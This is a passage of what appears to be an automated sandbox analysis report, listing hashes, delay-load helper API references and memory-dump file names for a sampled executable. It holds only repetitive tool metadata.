                                                                                                                    • Instruction ID: 6dbad3ae0cb7358d98a4c5667ff3c7a87e39e18d6f5035df7e48d6a6d4e4159c
                                                                                                                    • Opcode Fuzzy Hash: 0d6edd6c559a264e59583ed4de968ba7367c930d92d02bcd4d0073b1010f803f
                                                                                                                    • Instruction Fuzzy Hash: C8B012F1258480BC320C5146DE02C3B420DC3C1F12330803FFC4DC8081DC446F480435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d9a667576995772e919284dba0a74f16691fe5875fe121bb29be1584486ea3b2
                                                                                                                    • Instruction ID: ffd3c24d14723eb8a09e7f44b7450241beb36ca7231293b131a811bb8b83d0d7
                                                                                                                    • Opcode Fuzzy Hash: d9a667576995772e919284dba0a74f16691fe5875fe121bb29be1584486ea3b2
                                                                                                                    • Instruction Fuzzy Hash: 33B092E1259480AC324851459E02C3B020EC382B12320802EBC49C80819844AA491435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 8eb09521f9ebacafdfe9c878959dafb986ceb37d44e03197962d0bebf38e95a5
                                                                                                                    • Instruction ID: a6f3d1d60abd013cf308389aba3afc63e4c70760f0215ea74a270f0fe7564678
                                                                                                                    • Opcode Fuzzy Hash: 8eb09521f9ebacafdfe9c878959dafb986ceb37d44e03197962d0bebf38e95a5
                                                                                                                    • Instruction Fuzzy Hash: 65B092F5259580BC328852459E02C3B020EC381B12320812EBC49C808198446A880435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: a4394eb761a91fc89f3a0134cdfe003a9cb4a6c9aab03e6d40e34479b58039a7
                                                                                                                    • Instruction ID: 4de3f7dd1e4f66a11e749bb98fe25c8f7e8d4398f3b55cb45f42e090c62cb3d7
                                                                                                                    • Opcode Fuzzy Hash: a4394eb761a91fc89f3a0134cdfe003a9cb4a6c9aab03e6d40e34479b58039a7
                                                                                                                    • Instruction Fuzzy Hash: 07B092E1269480AC324851459E02C3B024EC781B12320802EBC4AC808198446A480435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 4b7dda4761bb8024599f91dd081e6a7d23cd920adbe7fe7290c6d52b7dc1a952
                                                                                                                    • Instruction ID: 71da6aa0d2a8d93b5380325ea3510ae97cb9e1319c0d39a0ad2154fc780726fc
                                                                                                                    • Opcode Fuzzy Hash: 4b7dda4761bb8024599f91dd081e6a7d23cd920adbe7fe7290c6d52b7dc1a952
                                                                                                                    • Instruction Fuzzy Hash: 60B012F1258480BC320C5195DE02C7B024DC3C2B12330C03FFD4DC8081DC44AF490435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d2d98577a7af2e2248566465bb28a9e62586bb0bac30a062582c540d25366175
                                                                                                                    • Instruction ID: d2ee33bb3d7c2105d52efad475b757593915f0145c3c0dfd03a5aaf60e47155d
                                                                                                                    • Opcode Fuzzy Hash: d2d98577a7af2e2248566465bb28a9e62586bb0bac30a062582c540d25366175
                                                                                                                    • Instruction Fuzzy Hash: FCB092F1258480AC320851859E02C7B028DC381B12320803EBC49C80819C456B490435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: c1a2be80c3fe4ad56264ae0c9097cfc3635d9981660b3669325720a11642b8d2
                                                                                                                    • Instruction ID: 59e33e7429fd756241ccf5fbf9d368d259d3c00df5e9c83ab8a4f33294446506
                                                                                                                    • Opcode Fuzzy Hash: c1a2be80c3fe4ad56264ae0c9097cfc3635d9981660b3669325720a11642b8d2
                                                                                                                    • Instruction Fuzzy Hash: 77B092E16980807C320851449906C7B0208C381B12320C02EFA58C508198480A4D0832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 3dc373d8ad46562a85122d278fbd665f14bfbeb75346757e94881dbc449fab13
                                                                                                                    • Instruction ID: 38d3536c38b64bd3cc4debb5036a49e3dbd5ae751ced6eb053c4b0966518e0cf
                                                                                                                    • Opcode Fuzzy Hash: 3dc373d8ad46562a85122d278fbd665f14bfbeb75346757e94881dbc449fab13
                                                                                                                    • Instruction Fuzzy Hash: 90B092F1658080BC320891449806C3B0208C381B12320802EFD58C5081D8484B480432
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: b89ea88bd218b61385e7a11778af1122185db45f01b2520e138d13240ef7edff
                                                                                                                    • Instruction ID: 8ab652627cf8a1041cc37126df37f1741d898ee1ce3d3b854e45cfb36e0c1b85
                                                                                                                    • Opcode Fuzzy Hash: b89ea88bd218b61385e7a11778af1122185db45f01b2520e138d13240ef7edff
                                                                                                                    • Instruction Fuzzy Hash: 65B092E1658080BC320891449806C3B0208C381B12320C02EFD58C5081D8484A480832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 06ebdccbeebbb43aa51c62da78fc73c5d7fbb2a0ba73fa60e0cf4a4ebf2ab60d
                                                                                                                    • Instruction ID: c070272769fd16f5f28a3c39f2bd5778b72d626fd1b462800c2a3101df336c9d
                                                                                                                    • Opcode Fuzzy Hash: 06ebdccbeebbb43aa51c62da78fc73c5d7fbb2a0ba73fa60e0cf4a4ebf2ab60d
                                                                                                                    • Instruction Fuzzy Hash: 30B092E26584807C310C11A49806E3B0208C382B12320802EB89894482A8440E080431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: ff650818ec7c78d16f59c34b048a636ceafd3db48a4e9a8d412488d5f7e58805
                                                                                                                    • Instruction ID: 49a85d73718e06569b78184f698afc0e72ed880b418ae570d85f1ff968bea6de
                                                                                                                    • Opcode Fuzzy Hash: ff650818ec7c78d16f59c34b048a636ceafd3db48a4e9a8d412488d5f7e58805
                                                                                                                    • Instruction Fuzzy Hash: BEB092E26584807C310C51689902D3B0608C382B12320802EB988C4081A8440E090431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 560cf0e3ddd2456f1f99b8b7540759f0cc97d1ffcec800fa030c9bcfad911851
                                                                                                                    • Instruction ID: 9d30c2926c192f3822bcad598b0c7d016623bf0e46a0cd22429150adaa1bfbeb
                                                                                                                    • Opcode Fuzzy Hash: 560cf0e3ddd2456f1f99b8b7540759f0cc97d1ffcec800fa030c9bcfad911851
                                                                                                                    • Instruction Fuzzy Hash: 88B012E26584807D310C5158DC02E3F020CC3C2F12330802FFC8CC4081FC440E080531
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
